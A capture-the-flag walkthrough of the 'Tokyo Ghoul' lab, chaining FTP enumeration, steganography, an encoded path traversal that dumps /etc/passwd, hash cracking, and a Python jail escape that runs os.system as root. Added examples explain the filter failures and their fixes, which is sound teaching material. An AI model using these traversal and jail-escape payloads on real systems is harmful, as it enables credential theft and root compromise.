My attack chain for Tokyo Ghoul. Nice web room that also contains file analysis and a Python jail for PrivEsc.
```bash
# enumeration: FTP, then mirror everything it serves (wget tries anonymous login by default)
ftp $ip
wget -r "ftp://$ip/"
# file analysis part: reverse the binary pulled from FTP in ghidra -> it wants the password kamishiro
ghidra
# feeding it kamishiro gives the steghide passphrase You_got_1t
# (-sf takes the stego file, -p the passphrase; the image is the one pulled from FTP)
steghide extract -sf <image pulled from FTP> -p You_got_1t
# web part
firefox "http://$ip/d1r3c70ry_center/"
gobuster dir -u "http://$ip/d1r3c70ry_center/" -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
# Path traversal on the view parameter
# -x proxies through Burp on 127.0.0.1:8080; -fw 40,42 drops the two word counts the non-hits come back with
ffuf -u "http://$ip/d1r3c70ry_center/claim/index.php?view=FUZZ" -w ../../../dirtraverse.txt -c -of md -o ffudir-traverse.md -x http://127.0.0.1:8080 -fw 40,42
# a literal ../ does not get through, the URL-encoded form %2e%2e/ does
firefox "http://$ip/d1r3c70ry_center/claim/index.php?view=/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd"
# hash cracking: kamishiro's hash from the /etc/passwd dump goes into hash.txt
john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt
# SSH to machine using cracked creds
ssh kamishiro@$ip
# root
sudo -l
# (ALL) /usr/bin/python3 /home/kamishiro/jail.py
sudo -u root /usr/bin/python3 /home/kamishiro/jail.py
# Hi! Welcome to my world kaneki...
# python injection payload: the jail blocks 'import', 'os' and 'system' as substrings of the raw input,
# so every blocked name is spelled in uppercase and rebuilt at runtime with .lower();
# __builtins__.__dict__['__IMPORT__'.lower()] is just __import__ under another spelling
__builtins__.__dict__['__IMPORT__'.lower()]('OS'.lower()).__dict__['SYSTEM'.lower()]('cat /root/root.txt')
# same payload with '/bin/bash' instead of the cat gives an interactive root shell
```
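Added example, not part of the original writeup: why the `%2e%2e/` form of the traversal above reaches `/etc/passwd`. The server-side check is not on the page, so it is modelled here as an assumed weak filter (a `../` substring test on the raw, still-encoded parameter), next to the check that would actually hold (decode and canonicalize first, then require the result to stay under the web root). The web root path is hypothetical.

```python
# Added example (not from the original writeup). The filter and web root
# are assumptions; the encoded payload is the one used against index.php.
import posixpath
from urllib.parse import unquote

WEBROOT = "/var/www/html/d1r3c70ry_center/claim"  # assumed, not from the page


def encode_traversal(depth: int, target: str) -> str:
    """Build the view= value used above: '/' + depth x '%2e%2e/' + target."""
    return "/" + "%2e%2e/" * depth + target.lstrip("/")


def blocked_before_decode(raw_value: str) -> bool:
    """Assumed weak filter: looks for a literal '../' in the raw parameter,
    before any URL-decoding has happened."""
    return "../" in raw_value


def canonical_path(raw_value: str, webroot: str = WEBROOT) -> str:
    """What the file system actually sees: decode, join to the web root,
    then collapse the '..' components (normpath never climbs above '/')."""
    decoded = unquote(raw_value)
    return posixpath.normpath(posixpath.join(webroot, decoded.lstrip("/")))


def allowed_after_canonicalize(raw_value: str, webroot: str = WEBROOT) -> bool:
    """Correct check: canonicalize first, then require the resolved path to
    stay strictly inside the web root."""
    resolved = canonical_path(raw_value, webroot)
    return resolved.startswith(webroot.rstrip("/") + "/")


if __name__ == "__main__":
    payload = encode_traversal(10, "/etc/passwd")
    print("raw value      :", payload)
    print("weak filter    :", "blocked" if blocked_before_decode(payload) else "passes")
    print("resolves to    :", canonical_path(payload))
    print("proper check   :", "allowed" if allowed_after_canonicalize(payload) else "blocked")
```

The weak filter never sees a `../` because the dots only appear after decoding, while the canonicalizing check rejects the payload and still accepts a plain `kaneki.txt` under the web root.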
```python
#! /usr/bin/python3
#-*- coding:utf-8 -*-
def main():
    print("Hi! Welcome to my world kaneki")
    print("========================================================================")
    print("What ? You gonna stand like a chicken ? fight me Kaneki")
    text = input('>>> ')
    # blocklist is a plain substring test on the raw input
    for keyword in ['eval', 'exec', 'import', 'open', 'os', 'read', 'system', 'write']:
        if keyword in text:
            print("Do you think i will let you do this ??????")
            return
    else:
        # for/else: reached only when no keyword matched, then the input is exec'd as root
        exec(text)
    print('No Kaneki you are so dead')
if __name__ == "__main__":
    main()
```
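Added example, not part of the original writeup or of jail.py: the jail's substring blocklist re-implemented so the bypass payload from the attack chain can be checked offline. It shows that naive payloads (and even harmless words like `position`) are rejected, that the `.lower()` payload passes the check untouched, and what that payload resolves to once evaluated. The callable is resolved without running any command; `builtins` is passed explicitly because jail.py runs as `__main__`, where `__builtins__` is the module rather than a dict.

```python
# Added example (not from the original writeup). BLOCKLIST is the exact
# list jail.py checks; everything else is illustration.
import builtins
import os

BLOCKLIST = ['eval', 'exec', 'import', 'open', 'os', 'read', 'system', 'write']


def jail_allows(text: str) -> bool:
    """Mirror jail.py: input passes only if no keyword is a substring of it."""
    return not any(keyword in text for keyword in BLOCKLIST)


def callable_expr() -> str:
    """Expression resolving to os.system without spelling 'import', 'os' or
    'system' in the source: the names are rebuilt at runtime by str.lower(),
    which a static substring check on the typed text never sees."""
    return ("__builtins__.__dict__['__IMPORT__'.lower()]('OS'.lower())"
            ".__dict__['SYSTEM'.lower()]")


def build_payload(command: str) -> str:
    """Full payload as typed into the jail prompt: the callable above,
    applied to a shell command."""
    return f"{callable_expr()}({command!r})"


def resolve_callable():
    """Evaluate only the callable part (no command is run) to prove what it
    resolves to. jail.py runs as __main__, where __builtins__ is the builtins
    module, so that same object is supplied here as the eval namespace."""
    return eval(callable_expr(), {"__builtins__": builtins})


if __name__ == "__main__":
    candidates = [
        "import os",                       # blocked: 'import', 'os'
        "__import__('os').system('id')",   # blocked: 'import', 'os', 'system'
        "position = 1",                    # blocked too: 'os' inside 'position'
        build_payload("cat /root/root.txt"),
    ]
    for candidate in candidates:
        verdict = "ALLOWED" if jail_allows(candidate) else "blocked"
        print(f"{verdict:7}  {candidate}")
    print("payload resolves to:", resolve_callable())
```

The takeaway is not a longer blocklist: as long as attacker-controlled text reaches `exec()`, names can be assembled at runtime in more ways than any denylist covers, so the only fix is not executing the input at all.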